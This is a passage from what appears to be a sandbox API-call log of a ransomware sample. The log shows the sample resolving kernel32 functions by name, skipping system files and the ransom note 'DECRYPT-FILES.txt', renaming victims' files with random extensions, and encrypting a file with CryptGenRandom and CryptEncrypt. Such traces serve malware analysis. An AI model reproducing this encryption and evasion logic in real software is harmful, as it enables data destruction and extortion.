lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.523] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.523] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.523] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.523] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.523] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.523] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.523] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.523] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.523] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.523] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.523] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.523] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.523] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.523] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.523] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.523] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.524] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.524] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.524] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.524] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.524] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.524] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.524] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.524] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.524] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.524] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.524] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.524] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv") returned 57 [0083.524] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv.YjxjbA2") returned 65 [0083.524] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppdirtkckpmkuty.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPDIRTkCKpmKuTY.mkv.YjxjbA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppdirtkckpmkuty.mkv.yjxjba2"), dwFlags=0x0) returned 1 [0083.525] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.525] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.525] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.526] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f28e000, ftCreationTime.dwHighDateTime=0x1d4c8bd, ftLastAccessTime.dwLowDateTime=0x3a24b7a0, ftLastAccessTime.dwHighDateTime=0x1d4c599, ftLastWriteTime.dwLowDateTime=0x3a24b7a0, ftLastWriteTime.dwHighDateTime=0x1d4c599, nFileSizeHigh=0x0, nFileSizeLow=0x151e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qi5 gao-vYK.ppt", cAlternateFileName="QI5GAO~1.PPT")) returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="DECRYPT-FILES.txt") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="autorun.inf") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="boot.ini") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="desktop.ini") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="ntuser.dat") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="iconcache.db") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="bootsect.bak") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="ntuser.dat.log") returned 1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="thumbs.db") returned -1 [0083.526] lstrcmpiW (lpString1="Qi5 gao-vYK.ppt", lpString2="Bootfont.bin") returned 1 [0083.526] lstrlenW (lpString="Qi5 gao-vYK.ppt") returned 15 [0083.526] lstrcmpiW (lpString1="ppt", lpString2="lnk") returned 1 [0083.526] lstrcmpiW (lpString1="ppt", lpString2="exe") returned 1 [0083.526] lstrcmpiW (lpString1="ppt", lpString2="sys") returned -1 [0083.526] lstrcmpiW (lpString1="ppt", lpString2="dll") returned 1 [0083.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.526] lstrlenW (lpString="Qi5 gao-vYK.ppt") returned 15 [0083.526] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.526] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Qi5 gao-vYK.ppt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt" [0083.526] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qi5 gao-vyk.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.527] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=86496) returned 1 [0083.527] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.527] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.527] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.527] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.527] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.527] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.527] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.529] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.529] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.530] CloseHandle (hObject=0x43c) returned 1 [0083.530] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.530] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.531] CloseHandle (hObject=0x0) returned 0 [0083.531] CloseHandle (hObject=0x438) returned 1 [0083.531] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.531] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.531] GetTickCount () returned 0x114d598 [0083.531] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.532] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.532] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.532] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.532] lstrlenA (lpString="kernel32.dll") returned 12 [0083.532] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.532] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.532] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.533] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.533] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.533] lstrlenA (lpString="ADDATOMA") returned 8 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.533] lstrlenA (lpString="ADDATOMW") returned 8 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.533] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.533] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.533] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.533] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.533] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.533] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.533] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.533] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.533] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.533] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.533] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.533] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.533] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.533] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.533] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.534] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.534] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.534] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.534] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.534] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.534] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.534] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.534] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.534] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.534] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.534] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.534] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.534] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.534] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.544] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.544] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.544] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.544] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.544] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.544] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.544] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.544] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.544] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.544] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.544] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.544] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.544] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.544] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.545] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.545] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.545] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.545] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.545] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.545] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.545] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.545] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.545] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.545] lstrlenA (lpString="BEEP") returned 4 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.545] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.545] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.545] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.545] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.545] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.545] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.545] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.545] lstrcpyA (in: lpString1=0x3f2d468, 